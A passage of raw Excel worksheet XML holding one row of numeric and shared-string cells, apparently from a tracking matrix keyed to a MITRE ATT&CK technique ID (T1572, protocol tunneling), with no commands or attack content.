      <c r="UY94" s="184"/>
      <c r="UZ94" s="184"/>
      <c r="VA94" s="184"/>
      <c r="VB94" s="184"/>
      <c r="VC94" s="184"/>
      <c r="VD94" s="184"/>
      <c r="VE94" s="184"/>
      <c r="VF94" s="184"/>
      <c r="VG94" s="184"/>
      <c r="VH94" s="184"/>
      <c r="VI94" s="184"/>
      <c r="VJ94" s="184"/>
      <c r="VK94" s="184"/>
      <c r="VL94" s="184"/>
      <c r="VM94" s="184"/>
      <c r="VN94" s="184"/>
      <c r="VO94" s="184"/>
      <c r="VP94" s="184"/>
      <c r="VQ94" s="184"/>
      <c r="VR94" s="184"/>
      <c r="VS94" s="184"/>
      <c r="VT94" s="184"/>
      <c r="VU94" s="184"/>
      <c r="VV94" s="184"/>
      <c r="VW94" s="184"/>
      <c r="VX94" s="184"/>
      <c r="VY94" s="184"/>
    </row>
    <row r="95" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A95" s="82" t="s">
        <v>5</v>
      </c>
      <c r="B95" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C95" s="83" t="s">
        <v>466</v>
      </c>
      <c r="D95" s="83" t="s">
        <v>142</v>
      </c>
      <c r="E95" s="83">
        <f t="shared" si="5"/>
        <v>63</v>
      </c>
      <c r="F95" s="83" t="s">
        <v>143</v>
      </c>
      <c r="G95" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H95" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I95" s="81" t="s">
        <v>1568</v>
      </c>
      <c r="J95" s="85" t="s">
        <v>742</v>
      </c>
      <c r="K95" s="81" t="s">
        <v>1569</v>
      </c>
      <c r="L95" s="81" t="s">
        <v>1570</v>
      </c>
      <c r="M95" s="378" t="s">
        <v>254</v>
      </c>
      <c r="N95" s="74" t="str">
        <f t="shared" si="3"/>
        <v>OK</v>
      </c>
      <c r="O95" s="485" t="str">
        <f t="shared" si="4"/>
        <v>New</v>
      </c>
      <c r="P95" s="91"/>
      <c r="Q95" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R95" s="92" t="s">
        <v>1571</v>
      </c>
      <c r="S95" s="93" t="s">
        <v>787</v>
      </c>
      <c r="T95" s="92" t="s">
        <v>1572</v>
      </c>
      <c r="U95" s="94" t="s">
        <v>1573</v>
      </c>
      <c r="V95" s="95" t="s">
        <v>821</v>
      </c>
      <c r="W95" s="96" t="s">
        <v>1574</v>
      </c>
      <c r="X95" s="196" t="s">
        <v>1575</v>
      </c>
      <c r="Y95" s="83" t="s">
        <v>1576</v>
      </c>
      <c r="Z95" s="188" t="s">
        <v>1577</v>
      </c>
      <c r="AA95" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB95" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC95" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD95" s="83"/>
      <c r="AE95" s="83"/>
      <c r="AF95" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG95" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH95" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI95" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ95" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK95" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL95" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM95" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN95" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO95" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP95" s="385" t="str">
        <f>M95&amp;"-frag"</f>
        <v>T1572-Protocol_Tunneling-frag</v>
      </c>
      <c r="AQ95" s="358">
        <v>3</v>
      </c>
      <c r="AR95" s="100"/>
      <c r="AS95" s="100">
        <v>1</v>
      </c>
      <c r="AT95" s="100">
        <v>1</v>
      </c>
      <c r="AU95" s="100">
        <v>2</v>
      </c>
      <c r="AV95" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW95" s="100">
        <v>1</v>
      </c>
      <c r="AX95" s="100">
        <v>1</v>
      </c>
      <c r="AY95" s="100">
        <v>0</v>
      </c>
      <c r="AZ95" s="100">
        <v>1</v>
      </c>
      <c r="BA95" s="381"/>
      <c r="BB95" s="101">
        <v>6</v>
      </c>
      <c r="BC95" s="102" t="s">
        <v>1797</v>
      </c>
      <c r="BD95" s="102">
        <v>2</v>
      </c>
      <c r="BE95" s="103" t="s">
        <v>336</v>
      </c>
      <c r="BF95" s="103">
        <v>1</v>
      </c>
      <c r="BG95" s="104">
        <v>2</v>
      </c>
      <c r="BH95" s="105">
        <v>1</v>
      </c>
      <c r="BI95" s="106" t="s">
        <v>1842</v>
      </c>
      <c r="BJ95" s="497">
        <v>1</v>
      </c>
      <c r="BK95" s="107" t="s">
        <v>1843</v>
      </c>
      <c r="BL95" s="107">
        <v>1</v>
      </c>
      <c r="BM95" s="108">
        <v>1</v>
      </c>
      <c r="BN95" s="109">
        <v>7</v>
      </c>
      <c r="BO95" s="110" t="s">
        <v>2056</v>
      </c>
      <c r="BP95" s="501">
        <v>3</v>
      </c>
      <c r="BQ95" s="111" t="s">
        <v>1983</v>
      </c>
      <c r="BR95" s="111">
        <v>2</v>
      </c>
      <c r="BS95" s="112">
        <v>2</v>
      </c>
      <c r="BT95" s="113">
        <v>7</v>
      </c>
      <c r="BU95" s="114" t="s">
        <v>2159</v>
      </c>
      <c r="BV95" s="503">
        <v>3</v>
      </c>
      <c r="BW95" s="115" t="s">
        <v>2130</v>
      </c>
      <c r="BX95" s="115">
        <v>2</v>
      </c>
      <c r="BY95" s="116">
        <v>2</v>
      </c>
      <c r="BZ95" s="250">
        <v>6</v>
      </c>
      <c r="CA95" s="251" t="s">
        <v>3827</v>
      </c>
      <c r="CB95" s="505">
        <v>4</v>
      </c>
      <c r="CC95" s="252" t="s">
        <v>3828</v>
      </c>
      <c r="CD95" s="252">
        <v>4</v>
      </c>
      <c r="CE95" s="253">
        <v>3</v>
      </c>
      <c r="CF95" s="101">
        <v>13</v>
      </c>
      <c r="CG95" s="102" t="s">
        <v>2115</v>
      </c>
      <c r="CH95" s="102">
        <v>7</v>
      </c>
      <c r="CI95" s="103" t="s">
        <v>2116</v>
      </c>
      <c r="CJ95" s="103">
        <v>6</v>
      </c>
      <c r="CK95" s="104">
        <v>3</v>
      </c>
      <c r="CL95" s="105">
        <v>0</v>
      </c>
      <c r="CM95" s="106">
        <v>0</v>
      </c>
      <c r="CN95" s="497">
        <v>0</v>
      </c>
      <c r="CO95" s="107">
        <v>0</v>
      </c>
      <c r="CP95" s="107">
        <v>0</v>
      </c>
      <c r="CQ95" s="108">
        <v>0</v>
      </c>
      <c r="CR95" s="109">
        <v>1</v>
      </c>
      <c r="CS95" s="110" t="s">
        <v>1930</v>
      </c>
      <c r="CT95" s="501">
        <v>1</v>
      </c>
      <c r="CU95" s="111" t="s">
        <v>1931</v>
      </c>
      <c r="CV95" s="111">
        <v>1</v>
      </c>
      <c r="CW95" s="112">
        <v>1</v>
      </c>
      <c r="CX95" s="113">
        <v>8</v>
      </c>
      <c r="CY95" s="114" t="s">
        <v>2193</v>
      </c>
      <c r="CZ95" s="503">
        <v>4</v>
      </c>
      <c r="DA95" s="115" t="s">
        <v>2194</v>
      </c>
      <c r="DB95" s="115">
        <v>3</v>
      </c>
      <c r="DC95" s="116">
        <v>2</v>
      </c>
      <c r="DD95" s="101">
        <v>0</v>
      </c>
      <c r="DE95" s="102">
        <v>0</v>
      </c>
      <c r="DF95" s="102">
        <v>0</v>
      </c>
      <c r="DG95" s="103">
        <v>0</v>
      </c>
      <c r="DH95" s="103">
        <v>0</v>
      </c>
      <c r="DI95" s="104">
        <v>0</v>
      </c>
      <c r="DJ95" s="105">
        <v>1</v>
      </c>
      <c r="DK95" s="106" t="s">
        <v>1842</v>
      </c>
      <c r="DL95" s="497">
        <v>1</v>
      </c>
      <c r="DM95" s="107" t="s">
        <v>1843</v>
      </c>
      <c r="DN95" s="107">
        <v>1</v>
      </c>
      <c r="DO95" s="108">
        <v>1</v>
      </c>
      <c r="DP95" s="109">
        <v>1</v>
      </c>
      <c r="DQ95" s="110" t="s">
        <v>1842</v>
      </c>
      <c r="DR95" s="501">
        <v>1</v>
      </c>
      <c r="DS95" s="111" t="s">
        <v>1843</v>
      </c>
      <c r="DT95" s="111">
        <v>1</v>
      </c>
      <c r="DU95" s="112">
        <v>1</v>
      </c>
      <c r="DV95" s="113">
        <v>1</v>
      </c>
      <c r="DW95" s="114" t="s">
        <v>1930</v>
      </c>
      <c r="DX95" s="503">
        <v>1</v>
      </c>
      <c r="DY95" s="115" t="s">
        <v>1931</v>
      </c>
      <c r="DZ95" s="115">
        <v>1</v>
      </c>
      <c r="EA95" s="116">
        <v>1</v>
      </c>
      <c r="EB95" s="250">
        <v>1</v>
      </c>
      <c r="EC95" s="251" t="s">
        <v>1842</v>
      </c>
      <c r="ED95" s="505">
        <v>1</v>
      </c>
      <c r="EE95" s="252" t="s">
        <v>1843</v>
      </c>
      <c r="EF95" s="252">
        <v>1</v>
      </c>
      <c r="EG95" s="253">
        <v>1</v>
      </c>
      <c r="EH95" s="101">
        <v>2</v>
      </c>
      <c r="EI95" s="102" t="s">
        <v>3829</v>
      </c>
      <c r="EJ95" s="102">
        <v>2</v>
      </c>
      <c r="EK95" s="103" t="s">
        <v>3830</v>
      </c>
      <c r="EL95" s="103">
        <v>2</v>
      </c>
      <c r="EM95" s="104">
        <v>2</v>
      </c>
      <c r="EN95" s="105">
        <v>0</v>
      </c>
      <c r="EO95" s="106">
        <v>0</v>
      </c>
      <c r="EP95" s="497">
        <v>0</v>
      </c>
      <c r="EQ95" s="107">
        <v>0</v>
      </c>
      <c r="ER95" s="107">
        <v>0</v>
      </c>
      <c r="ES95" s="108">
        <v>0</v>
      </c>
      <c r="ET95" s="109">
        <v>1</v>
      </c>
      <c r="EU95" s="110" t="s">
        <v>1930</v>
      </c>
      <c r="EV95" s="501">
        <v>1</v>
      </c>
      <c r="EW95" s="111" t="s">
        <v>1931</v>
      </c>
      <c r="EX95" s="111">
        <v>1</v>
      </c>
      <c r="EY95" s="112">
        <v>1</v>
      </c>
      <c r="EZ95" s="113">
        <v>2</v>
      </c>
      <c r="FA95" s="114" t="s">
        <v>3831</v>
      </c>
      <c r="FB95" s="503">
        <v>2</v>
      </c>
      <c r="FC95" s="115" t="s">
        <v>3832</v>
      </c>
      <c r="FD95" s="115">
        <v>2</v>
      </c>
      <c r="FE95" s="116">
        <v>2</v>
      </c>
      <c r="FF95" s="101">
        <v>6</v>
      </c>
      <c r="FG95" s="102" t="s">
        <v>1797</v>
      </c>
      <c r="FH95" s="102">
        <v>2</v>
      </c>
      <c r="FI95" s="103" t="s">
        <v>336</v>
      </c>
      <c r="FJ95" s="103">
        <v>1</v>
      </c>
      <c r="FK95" s="104">
        <v>2</v>
      </c>
      <c r="FL95" s="105">
        <v>0</v>
      </c>
      <c r="FM95" s="106">
        <v>0</v>
      </c>
      <c r="FN95" s="497">
        <v>0</v>
      </c>
      <c r="FO95" s="107">
        <v>0</v>
      </c>
      <c r="FP95" s="107">
        <v>0</v>
      </c>
      <c r="FQ95" s="108">
        <v>0</v>
      </c>
      <c r="FR95" s="109">
        <v>6</v>
      </c>
      <c r="FS95" s="110" t="s">
        <v>1797</v>
      </c>
      <c r="FT95" s="501">
        <v>2</v>
      </c>
      <c r="FU95" s="111" t="s">
        <v>336</v>
      </c>
      <c r="FV95" s="111">
        <v>1</v>
      </c>
      <c r="FW95" s="112">
        <v>2</v>
      </c>
      <c r="FX95" s="113">
        <v>6</v>
      </c>
      <c r="FY95" s="114" t="s">
        <v>1797</v>
      </c>
      <c r="FZ95" s="503">
        <v>2</v>
      </c>
      <c r="GA95" s="115" t="s">
        <v>336</v>
      </c>
      <c r="GB95" s="115">
        <v>1</v>
      </c>
      <c r="GC95" s="116">
        <v>2</v>
      </c>
      <c r="GD95" s="250">
        <v>5</v>
      </c>
      <c r="GE95" s="251" t="s">
        <v>3833</v>
      </c>
      <c r="GF95" s="505">
        <v>3</v>
      </c>
      <c r="GG95" s="252" t="s">
        <v>3834</v>
      </c>
      <c r="GH95" s="252">
        <v>3</v>
      </c>
      <c r="GI95" s="253">
        <v>2</v>
      </c>
      <c r="GJ95" s="101">
        <v>11</v>
      </c>
      <c r="GK95" s="102" t="s">
        <v>3835</v>
      </c>
      <c r="GL95" s="102">
        <v>5</v>
      </c>
      <c r="GM95" s="103" t="s">
        <v>3836</v>
      </c>
      <c r="GN95" s="103">
        <v>4</v>
      </c>
      <c r="GO95" s="104">
        <v>3</v>
      </c>
      <c r="GP95" s="105">
        <v>0</v>
      </c>
      <c r="GQ95" s="106">
        <v>0</v>
      </c>
      <c r="GR95" s="497">
        <v>0</v>
      </c>
      <c r="GS95" s="107">
        <v>0</v>
      </c>
      <c r="GT95" s="107">
        <v>0</v>
      </c>
      <c r="GU95" s="108">
        <v>0</v>
      </c>
      <c r="GV95" s="109">
        <v>0</v>
      </c>
      <c r="GW95" s="110">
        <v>0</v>
      </c>
      <c r="GX95" s="501">
        <v>0</v>
      </c>
      <c r="GY95" s="111">
        <v>0</v>
      </c>
      <c r="GZ95" s="111">
        <v>0</v>
      </c>
      <c r="HA95" s="112">
        <v>0</v>
      </c>
      <c r="HB95" s="113">
        <v>6</v>
      </c>
      <c r="HC95" s="114" t="s">
        <v>1797</v>
      </c>
      <c r="HD95" s="503">
        <v>2</v>
      </c>
      <c r="HE95" s="115" t="s">
        <v>336</v>
      </c>
      <c r="HF95" s="115">
        <v>1</v>
      </c>
      <c r="HG95" s="116">
        <v>2</v>
      </c>
      <c r="HH95" s="101">
        <v>0</v>
      </c>
      <c r="HI95" s="102">
        <v>0</v>
      </c>
      <c r="HJ95" s="102">
        <v>0</v>
      </c>
      <c r="HK95" s="103">
        <v>0</v>
      </c>
      <c r="HL95" s="103">
        <v>0</v>
      </c>
      <c r="HM95" s="104">
        <v>0</v>
      </c>
      <c r="HN95" s="105">
        <v>0</v>
      </c>
      <c r="HO95" s="106">
        <v>0</v>
      </c>
      <c r="HP95" s="497">
        <v>0</v>
      </c>
      <c r="HQ95" s="107">
        <v>0</v>
      </c>
      <c r="HR95" s="107">
        <v>0</v>
      </c>
      <c r="HS95" s="108">
        <v>0</v>
      </c>
      <c r="HT95" s="109">
        <v>0</v>
      </c>
      <c r="HU95" s="110">
        <v>0</v>
      </c>
      <c r="HV95" s="501">
        <v>0</v>
      </c>
      <c r="HW95" s="111">
        <v>0</v>
      </c>
      <c r="HX95" s="111">
        <v>0</v>
      </c>
      <c r="HY95" s="112">
        <v>0</v>
      </c>
      <c r="HZ95" s="113">
        <v>0</v>
      </c>
      <c r="IA95" s="114">
        <v>0</v>
      </c>
      <c r="IB95" s="503">
        <v>0</v>
      </c>
      <c r="IC95" s="115">
        <v>0</v>
      </c>
      <c r="ID95" s="115">
        <v>0</v>
      </c>
      <c r="IE95" s="116">
        <v>0</v>
      </c>
      <c r="IF95" s="250">
        <v>0</v>
      </c>
      <c r="IG95" s="251">
        <v>0</v>
      </c>
      <c r="IH95" s="505">
        <v>0</v>
      </c>
      <c r="II95" s="252">
        <v>0</v>
      </c>
      <c r="IJ95" s="252">
        <v>0</v>
      </c>
      <c r="IK95" s="253">
        <v>0</v>
      </c>
      <c r="IL95" s="101">
        <v>0</v>
      </c>
      <c r="IM95" s="102">
        <v>0</v>
      </c>
      <c r="IN95" s="102">
        <v>0</v>
      </c>
      <c r="IO95" s="103">
        <v>0</v>
      </c>
      <c r="IP95" s="103">
        <v>0</v>
      </c>
      <c r="IQ95" s="104">
        <v>0</v>
      </c>
      <c r="IR95" s="105">
        <v>0</v>
      </c>
      <c r="IS95" s="106">
        <v>0</v>
      </c>
      <c r="IT95" s="497">
        <v>0</v>
      </c>
      <c r="IU95" s="107">
        <v>0</v>
      </c>
      <c r="IV95" s="107">
        <v>0</v>
      </c>
      <c r="IW95" s="108">
        <v>0</v>
      </c>
      <c r="IX95" s="109">
        <v>0</v>
      </c>
      <c r="IY95" s="110">
        <v>0</v>
      </c>
      <c r="IZ95" s="501">
        <v>0</v>
      </c>
      <c r="JA95" s="111">
        <v>0</v>
      </c>
      <c r="JB95" s="111">
        <v>0</v>
      </c>
      <c r="JC95" s="112">
        <v>0</v>
      </c>
      <c r="JD95" s="113">
        <v>0</v>
      </c>
      <c r="JE95" s="114">
        <v>0</v>
      </c>
      <c r="JF95" s="503">
        <v>0</v>
      </c>
      <c r="JG95" s="115">
        <v>0</v>
      </c>
      <c r="JH95" s="115">
        <v>0</v>
      </c>
      <c r="JI95" s="116">
        <v>0</v>
      </c>
      <c r="JJ95" s="101">
        <v>0</v>
      </c>
      <c r="JK95" s="102">
        <v>0</v>
      </c>
      <c r="JL95" s="102">
        <v>0</v>
      </c>
      <c r="JM95" s="103">
        <v>0</v>
      </c>
      <c r="JN95" s="103">
        <v>0</v>
      </c>
      <c r="JO95" s="104">
        <v>0</v>
      </c>
      <c r="JP95" s="105">
        <v>0</v>
      </c>
      <c r="JQ95" s="106">
        <v>0</v>
      </c>
      <c r="JR95" s="497">
        <v>0</v>
      </c>
      <c r="JS95" s="107">
        <v>0</v>
      </c>
      <c r="JT95" s="107">
        <v>0</v>
      </c>
      <c r="JU95" s="108">
        <v>0</v>
      </c>
      <c r="JV95" s="109">
        <v>0</v>
      </c>
      <c r="JW95" s="110">
        <v>0</v>
      </c>
      <c r="JX95" s="501">
        <v>0</v>
      </c>
      <c r="JY95" s="111">
        <v>0</v>
      </c>
      <c r="JZ95" s="111">
        <v>0</v>
      </c>
      <c r="KA95" s="112">
        <v>0</v>
      </c>
      <c r="KB95" s="113">
        <v>0</v>
      </c>
      <c r="KC95" s="114">
        <v>0</v>
      </c>
      <c r="KD95" s="503">
        <v>0</v>
      </c>
      <c r="KE95" s="115">
        <v>0</v>
      </c>
      <c r="KF95" s="115">
        <v>0</v>
      </c>
      <c r="KG95" s="116">
        <v>0</v>
      </c>
      <c r="KH95" s="250">
        <v>0</v>
      </c>
      <c r="KI95" s="251">
        <v>0</v>
      </c>
      <c r="KJ95" s="505">
        <v>0</v>
      </c>
      <c r="KK95" s="252">
        <v>0</v>
      </c>
      <c r="KL95" s="252">
        <v>0</v>
      </c>
      <c r="KM95" s="253">
        <v>0</v>
      </c>
      <c r="KN95" s="101">
        <v>0</v>
      </c>
      <c r="KO95" s="102">
        <v>0</v>
      </c>
      <c r="KP95" s="102">
        <v>0</v>
      </c>
      <c r="KQ95" s="103">
        <v>0</v>
      </c>
      <c r="KR95" s="103">
        <v>0</v>
      </c>
      <c r="KS95" s="104">
        <v>0</v>
      </c>
      <c r="KT95" s="105">
        <v>0</v>
      </c>
      <c r="KU95" s="106">
        <v>0</v>
      </c>
      <c r="KV95" s="497">
        <v>0</v>
      </c>
      <c r="KW95" s="107">
        <v>0</v>
      </c>
      <c r="KX95" s="107">
        <v>0</v>
      </c>
      <c r="KY95" s="108">
        <v>0</v>
      </c>
      <c r="KZ95" s="109">
        <v>0</v>
      </c>
      <c r="LA95" s="110">
        <v>0</v>
      </c>
      <c r="LB95" s="501">
        <v>0</v>
      </c>
      <c r="LC95" s="111">
        <v>0</v>
      </c>
      <c r="LD95" s="111">
        <v>0</v>
      </c>
      <c r="LE95" s="112">
        <v>0</v>
      </c>
      <c r="LF95" s="113">
        <v>0</v>
      </c>
      <c r="LG95" s="114">
        <v>0</v>
      </c>
      <c r="LH95" s="503">
        <v>0</v>
      </c>
      <c r="LI95" s="115">
        <v>0</v>
      </c>
      <c r="LJ95" s="115">
        <v>0</v>
      </c>
      <c r="LK95" s="116">
        <v>0</v>
      </c>
      <c r="LL95" s="117">
        <v>6</v>
      </c>
      <c r="LM95" s="507">
        <v>5</v>
      </c>
      <c r="LN95" s="119">
        <v>3</v>
      </c>
      <c r="LO95" s="119">
        <v>2</v>
      </c>
      <c r="LP95" s="119">
        <v>2</v>
      </c>
      <c r="LQ95" s="119">
        <v>2</v>
      </c>
      <c r="LR95" s="119">
        <v>1</v>
      </c>
      <c r="LS95" s="119">
        <v>2</v>
      </c>
      <c r="LT95" s="382"/>
      <c r="LU95" s="117">
        <v>0</v>
      </c>
      <c r="LV95" s="118">
        <v>0</v>
      </c>
      <c r="LW95" s="507">
        <v>0</v>
      </c>
      <c r="LX95" s="119">
        <v>0</v>
      </c>
      <c r="LY95" s="119">
        <v>0</v>
      </c>
      <c r="LZ95" s="119">
        <v>0</v>
      </c>
      <c r="MA95" s="117">
        <v>0</v>
      </c>
      <c r="MB95" s="118">
        <v>0</v>
      </c>
      <c r="MC95" s="507">
        <v>0</v>
      </c>
      <c r="MD95" s="119">
        <v>0</v>
      </c>
      <c r="ME95" s="119">
        <v>0</v>
      </c>
      <c r="MF95" s="119">
        <v>0</v>
      </c>
      <c r="MG95" s="117">
        <v>0</v>
      </c>
      <c r="MH95" s="118">
        <v>0</v>
      </c>
      <c r="MI95" s="507">
        <v>0</v>
      </c>
      <c r="MJ95" s="119">
        <v>0</v>
      </c>
      <c r="MK95" s="119">
        <v>0</v>
      </c>
      <c r="ML95" s="119">
        <v>0</v>
      </c>
      <c r="MM95" s="117">
        <v>1</v>
      </c>
      <c r="MN95" s="118" t="s">
        <v>4152</v>
      </c>
      <c r="MO95" s="507">
        <v>1</v>
      </c>
      <c r="MP95" s="119" t="s">
        <v>2501</v>
      </c>
      <c r="MQ95" s="119">
        <v>1</v>
      </c>
      <c r="MR95" s="119">
        <v>1</v>
      </c>
      <c r="MS95" s="117">
        <v>3</v>
      </c>
      <c r="MT95" s="118" t="s">
        <v>4239</v>
      </c>
      <c r="MU95" s="507">
        <v>2</v>
      </c>
      <c r="MV95" s="119" t="s">
        <v>2586</v>
      </c>
      <c r="MW95" s="119">
        <v>2</v>
      </c>
      <c r="MX95" s="119">
        <v>1</v>
      </c>
      <c r="MY95" s="117">
        <v>0</v>
      </c>
      <c r="MZ95" s="118">
        <v>0</v>
      </c>
      <c r="NA95" s="507">
        <v>0</v>
      </c>
      <c r="NB95" s="119">
        <v>0</v>
      </c>
      <c r="NC95" s="119">
        <v>0</v>
      </c>
      <c r="ND95" s="119">
        <v>0</v>
      </c>
      <c r="NE95" s="117">
        <v>1</v>
      </c>
      <c r="NF95" s="118" t="s">
        <v>4180</v>
      </c>
      <c r="NG95" s="507">
        <v>1</v>
      </c>
      <c r="NH95" s="119" t="s">
        <v>2754</v>
      </c>
      <c r="NI95" s="119">
        <v>1</v>
      </c>
      <c r="NJ95" s="119">
        <v>1</v>
      </c>
      <c r="NK95" s="117">
        <v>0</v>
      </c>
      <c r="NL95" s="118">
        <v>0</v>
      </c>
      <c r="NM95" s="507">
        <v>0</v>
      </c>
      <c r="NN95" s="119">
        <v>0</v>
      </c>
      <c r="NO95" s="119">
        <v>0</v>
      </c>
      <c r="NP95" s="119">
        <v>0</v>
      </c>
      <c r="NQ95" s="117">
        <v>0</v>
      </c>
      <c r="NR95" s="118">
        <v>0</v>
      </c>
      <c r="NS95" s="507">
        <v>0</v>
      </c>
      <c r="NT95" s="119">
        <v>0</v>
      </c>
      <c r="NU95" s="119">
        <v>0</v>
      </c>
      <c r="NV95" s="119">
        <v>0</v>
      </c>
      <c r="NW95" s="117">
        <v>1</v>
      </c>
      <c r="NX95" s="118" t="s">
        <v>4314</v>
      </c>
      <c r="NY95" s="507">
        <v>1</v>
      </c>
      <c r="NZ95" s="119" t="s">
        <v>2502</v>
      </c>
      <c r="OA95" s="119">
        <v>1</v>
      </c>
      <c r="OB95" s="119">
        <v>1</v>
      </c>
      <c r="OC95" s="120">
        <v>1</v>
      </c>
      <c r="OD95" s="120">
        <v>1</v>
      </c>
      <c r="OE95" s="120">
        <v>1</v>
      </c>
      <c r="OF95" s="121">
        <v>1</v>
      </c>
      <c r="OG95" s="120">
        <v>1</v>
      </c>
      <c r="OH95" s="120">
        <v>1</v>
      </c>
      <c r="OI95" s="120">
        <v>1</v>
      </c>
      <c r="OJ95" s="120">
        <v>1</v>
      </c>
      <c r="OK95" s="383"/>
      <c r="OL95" s="120">
        <v>1</v>
      </c>
      <c r="OM95" s="120">
        <v>1</v>
      </c>
      <c r="ON95" s="120">
        <v>1</v>
      </c>
      <c r="OO95" s="120" t="s">
        <v>2503</v>
      </c>
      <c r="OP95" s="120">
        <v>1</v>
      </c>
      <c r="OQ95" s="464">
        <v>1</v>
      </c>
      <c r="OR95" s="120">
        <v>0</v>
      </c>
      <c r="OS95" s="120">
        <v>0</v>
      </c>
      <c r="OT95" s="120">
        <v>0</v>
      </c>
      <c r="OU95" s="120"/>
      <c r="OV95" s="120">
        <v>0</v>
      </c>
      <c r="OW95" s="464">
        <v>0</v>
      </c>
      <c r="OX95" s="120">
        <v>0</v>
      </c>
      <c r="OY95" s="120">
        <v>0</v>
      </c>
      <c r="OZ95" s="120">
        <v>0</v>
      </c>
      <c r="PA95" s="120"/>
      <c r="PB95" s="120">
        <v>0</v>
      </c>
      <c r="PC95" s="464">
        <v>0</v>
      </c>
      <c r="PD95" s="120">
        <v>0</v>
      </c>
      <c r="PE95" s="120">
        <v>0</v>
      </c>
      <c r="PF95" s="120">
        <v>0</v>
      </c>
      <c r="PG95" s="120"/>
      <c r="PH95" s="120">
        <v>0</v>
      </c>
      <c r="PI95" s="464">
        <v>0</v>
      </c>
      <c r="PJ95" s="120">
        <v>0</v>
      </c>
      <c r="PK95" s="120">
        <v>0</v>
      </c>
      <c r="PL95" s="120">
        <v>0</v>
      </c>
      <c r="PM95" s="120"/>
      <c r="PN95" s="120">
        <v>0</v>
      </c>
      <c r="PO95" s="464">
        <v>0</v>
      </c>
      <c r="PP95" s="120">
        <v>0</v>
      </c>
      <c r="PQ95" s="120">
        <v>0</v>
      </c>
      <c r="PR95" s="120">
        <v>0</v>
      </c>
      <c r="PS95" s="120"/>
      <c r="PT95" s="120">
        <v>0</v>
      </c>
      <c r="PU95" s="464">
        <v>0</v>
      </c>
      <c r="PV95" s="120">
        <v>0</v>
      </c>
      <c r="PW95" s="120">
        <v>0</v>
      </c>
      <c r="PX95" s="120">
        <v>0</v>
      </c>
      <c r="PY95" s="120"/>
      <c r="PZ95" s="120">
        <v>0</v>
      </c>
      <c r="QA95" s="464">
        <v>0</v>
      </c>
      <c r="QB95" s="120">
        <v>0</v>
      </c>
      <c r="QC95" s="120">
        <v>0</v>
      </c>
      <c r="QD95" s="120">
        <v>0</v>
      </c>
      <c r="QE95" s="120"/>
      <c r="QF95" s="120">
        <v>0</v>
      </c>
      <c r="QG95" s="464">
        <v>0</v>
      </c>
      <c r="QH95" s="120">
        <v>1</v>
      </c>
      <c r="QI95" s="120">
        <v>1</v>
      </c>
      <c r="QJ95" s="120">
        <v>1</v>
      </c>
      <c r="QK95" s="120" t="s">
        <v>1561</v>
      </c>
      <c r="QL95" s="120">
        <v>1</v>
      </c>
      <c r="QM95" s="464">
        <v>1</v>
      </c>
      <c r="QN95" s="120">
        <v>0</v>
      </c>
      <c r="QO95" s="120">
        <v>0</v>
      </c>
      <c r="QP95" s="120">
        <v>0</v>
      </c>
      <c r="QQ95" s="120"/>
      <c r="QR95" s="120">
        <v>0</v>
      </c>
      <c r="QS95" s="464">
        <v>0</v>
      </c>
      <c r="QT95" s="184"/>
      <c r="QU95" s="184"/>
      <c r="QV95" s="184"/>
      <c r="QW95" s="184"/>
      <c r="QX95" s="184"/>
      <c r="QY95" s="184"/>
      <c r="QZ95" s="184"/>
      <c r="RA95" s="184"/>
      <c r="RB95" s="184"/>
      <c r="RC95" s="184"/>
      <c r="RD95" s="184"/>
      <c r="RE95" s="184"/>
      <c r="RF95" s="184"/>
      <c r="RG95" s="184"/>
      <c r="RH95" s="184"/>
      <c r="RI95" s="184"/>
      <c r="RJ95" s="184"/>
      <c r="RK95" s="184"/>
      <c r="RL95" s="184"/>
      <c r="RM95" s="184"/>
      <c r="RN95" s="184"/>
      <c r="RO95" s="184"/>
      <c r="RP95" s="184"/>
      <c r="RQ95" s="184"/>
      <c r="RR95" s="184"/>
      <c r="RS95" s="184"/>
      <c r="RT95" s="184"/>
      <c r="RU95" s="184"/>
      <c r="RV95" s="184"/>
      <c r="RW95" s="184"/>
      <c r="RX95" s="184"/>
      <c r="RY95" s="184"/>
      <c r="RZ95" s="184"/>
      <c r="SA95" s="184"/>
      <c r="SB95" s="184"/>
      <c r="SC95" s="184"/>
      <c r="SD95" s="184"/>
      <c r="SE95" s="184"/>
      <c r="SF95" s="184"/>
      <c r="SG95" s="184"/>
      <c r="SH95" s="184"/>
      <c r="SI95" s="184"/>
      <c r="SJ95" s="184"/>
      <c r="SK95" s="184"/>
      <c r="SL95" s="184"/>
      <c r="SM95" s="184"/>
      <c r="SN95" s="184"/>
      <c r="SO95" s="184"/>
      <c r="SP95" s="184"/>
      <c r="SQ95" s="184"/>
      <c r="SR95" s="184"/>
      <c r="SS95" s="184"/>
      <c r="ST95" s="184"/>
      <c r="SU95" s="184"/>
      <c r="SV95" s="184"/>
      <c r="SW95" s="184"/>
      <c r="SX95" s="184"/>
      <c r="SY95" s="184"/>
      <c r="SZ95" s="184"/>
      <c r="TA95" s="184"/>
      <c r="TB95" s="184"/>
      <c r="TC95" s="184"/>
      <c r="TD95" s="184"/>
      <c r="TE95" s="184"/>
      <c r="TF95" s="184"/>
      <c r="TG95" s="184"/>
      <c r="TH95" s="184"/>
      <c r="TI95" s="184"/>
      <c r="TJ95" s="184"/>
      <c r="TK95" s="184"/>
      <c r="TL95" s="184"/>
      <c r="TM95" s="184"/>
      <c r="TN95" s="184"/>
      <c r="TO95" s="184"/>
      <c r="TP95" s="184"/>
      <c r="TQ95" s="184"/>
      <c r="TR95" s="184"/>
      <c r="TS95" s="184"/>
